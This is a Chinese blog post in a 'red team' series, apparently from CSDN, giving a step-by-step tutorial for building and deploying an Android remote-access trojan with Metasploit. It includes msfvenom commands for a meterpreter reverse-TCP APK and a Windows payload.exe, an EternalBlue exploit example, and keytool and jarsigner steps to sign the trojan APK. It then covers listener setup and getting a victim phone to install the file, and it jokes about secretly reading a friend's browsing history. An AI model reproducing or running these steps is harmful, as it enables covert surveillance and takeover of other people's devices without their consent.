红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)

大家好,我是Dest1ny。

今天我们是红队专题中的远控安卓。

这个实验会非常有趣,大家多多点赞!


环境:

一台有公网ip的vps / kali / 带msf工具即可

一台安卓手机(最好老一点,因为我们这里不涉及免杀)

CLASS-1 msfconsole 和 msfvenom

msfconsole

  • 功能: msfconsole 是 Metasploit 框架的主要命令行界面,是一个功能全面且强大的控制台。它用于执行各种攻击操作,包括漏洞扫描、漏洞利用、后期渗透等。
  • 特点:
    • 允许用户浏览、选择和执行可用的漏洞利用模块(Exploit Modules)。
    • 可以设置Payload(恶意代码)、编码器(Encoders)、监听器(Listeners)等参数。
    • 支持通过插件和脚本扩展功能,如 post-exploitation 模块、漏洞扫描插件等。
    • 支持与其他工具集成,方便进行信息收集、漏洞扫描、提权和持久化等任务。
  • 使用场景:
    • 当你想要选择和执行漏洞利用时,可以通过 msfconsole 加载模块、配置参数,并执行攻击。
    • 适合实时操作和渗透测试人员互动操作。
msfconsole

进入控制台后,可以使用例如以下命令:

use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS 192.168.1.100 
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
run 

msfvenom

  • 功能: msfvenom 是 Metasploit 用于生成攻击Payload的工具,它将之前的 msfpayloadmsfencode 工具合并为一个单独的工具。主要用于生成可用于漏洞利用的有效载荷(Payload)。
  • 特点:
    • 允许用户自定义Payload,并指定生成的格式(如 exe, elf, apk, raw 等)。
    • 支持对Payload进行编码和混淆,以绕过杀毒软件或检测机制。
    • 生成后的Payload可以与其他工具(如 msfconsole)一起使用,或直接用于恶意软件开发。
  • 使用场景:
    • 当你需要生成特定的Payload(如反向shell、绑定shell、下载执行器等)时,可以使用 msfvenom 自定义Payload参数并生成对应的文件。
    • 适合用来制作免杀Payload、混淆恶意软件,或在渗透测试中注入漏洞利用代码。
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
  • 这条命令将生成一个反向TCP连接的Windows Meterpreter Payload,并保存为一个可执行文件 payload.exe

总结

  • msfconsole: 用于管理和执行漏洞利用的交互式控制台。
  • msfvenom: 用于生成和编码恶意Payload的工具。

CLASS-2 制作安卓木马

我们先使用msfvenom去制作木马!

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.209 LPORT=4444 R > Dest1ny.apk

这里的lhost使用本地的ip,lport是你想去监听的端口

CLASS-3 apk签名

为什么要apk签名?

APK需要签名的原因主要有以下几点:

  1. 验证完整性:签名确保APK未被篡改。如果APK文件被修改,签名验证将失败,系统会阻止安装。

  2. 开发者身份:签名帮助识别应用程序的开发者,确保应用来自可信来源,防止恶意软件冒充合法应用。

  3. 权限管理:通过签名,应用可以安全地共享权限和数据。如果两个应用具有相同签名,可以相互访问数据。

  4. 安全分发:在官方应用商店发布的APK必须签名,以减少恶意软件传播的风险。

  5. 防伪造:签名防止攻击者伪造应用,确保只有合法的APK能被安装和运行。

现在我们有一个apk文件,但是不是所有的apk文件都可以传到手机上就可以下载,我们要加入签名才可以。

第一步:使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

这时候你会有一个my-release-key.Keystore的文件

第二步:使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore Dest1ny.apk alias_name

第三步:然后使用JARsigner验证签名

jarsigner -verify -verbose -certs Dest1ny.apk

 

CLASS-4  开始远控

使用msfconsole开启Metasploit

进行监听,要提前设置payload

use 7即可mei

没有公网ip,需要攻击机和被害机都在同一局域网下

然后就是设置lhost和lport

还要设置一下payload

android/meterpreter/reverse_tcp

 

使用你的被害者手机去下载apk文件,因为没有免杀,你要去手动下载!

这时候你就可以去偷偷看朋友的浏览记录了hhhh!

这里就不演示了!


今天肯定不水了!

后面我也会持续去更新内容!

大家多多点赞!!

想到300粉丝了!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值